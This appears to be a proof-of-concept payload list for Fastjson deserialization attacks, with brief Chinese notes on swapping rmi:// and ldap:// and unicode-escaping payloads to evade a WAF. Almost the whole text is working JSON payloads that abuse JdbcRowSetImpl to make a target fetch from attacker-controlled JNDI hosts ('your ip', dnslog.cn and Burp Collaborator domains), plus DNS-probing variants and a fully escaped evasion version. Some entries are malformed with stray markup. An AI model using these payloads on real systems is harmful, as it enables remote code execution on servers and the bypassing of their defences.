poc
rmi://、ldap:// 可以切换尝试
然后绕过waf的话 就全部转化成 unicode字符。

param={
    "@type": "java.lang.Class",
    br / > "a": {
        "@type": "java.lang.Class",
        "val": "com.sun.rowset.JdbcRowSetImpl"
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        br / >
    },
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "ldap://your ip/",
        "autoCommit": true
    }
}

param={
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://your ip/",
        "autoCommit":true
    }
}

param={"orderNo":"B200414195915053000","partnerOrderNo":"DC200414593341","x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/","autoCommit":true}}

param={"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://your ip/","autoCommit":true}}}

param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://9jo6zi.dnslog.cn","autoCommit":true}

param={"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://your ip/","autoCommit":true}

#####

```

{"orderNo":"B200414195915053000","partnerOrderNo":"DC200414593341","x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ecu6ognvy7jundp446drfy5utlzdn2.burpcollaborator.net","autoCommit":true}}


{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ecu6ognvy7jundp446drfy5utlzdn2.burpcollaborator.net","autoCommit":true}}}


{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://ecu6ognvy7jundp446drfy5utlzdn2.burpcollaborator.net","autoCommit":true}
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://ecu6ognvy7jundp446drfy5utlzdn2.burpcollaborator.net","autoCommit":true}
{"@type":"java.net.Inet4Address","val":"http://ecu6ognvy7jundp446drfy5utlzdn2.burpcollaborator.net"}
{"@type":"java.net.Inet6Address","val":"http://ecu6ognvy7jundp446drfy5utlzdn2.burpcollaborator.net"}
{{"@type":"java.net.URL","val":"http://ecu6ognvy7jundp446drfy5utlzdn2.burpcollaborator.net"}:"x"}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://ecu6ognvy7jundp446drfy5utlzdn2.burpcollaborator.net"}}""}
{"@type":"java.net.URL","val":"http://ecu6ognvy7jundp446drfy5utlzdn2.burpcollaborator.net"}
{"@type":"java.net.URL","val":"http://ecu6ognvy7jundp446drfy5utlzdn2.burpcollaborator.net"}
{{"@type":"java.net.URL","val":"http://ecu6ognvy7jundp446drfy5utlzdn2.burpcollaborator.net}
{"@type":"java.lang.Exception", "@type":"PingException","domain":"ecu6ognvy7jundp446drfy5utlzdn2.burpcollaborator.net"}


{"name":{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073","\u0076\u0061\u006c":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"x":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://oiknq7.dnslog.cn/","autoCommit":true}}

```



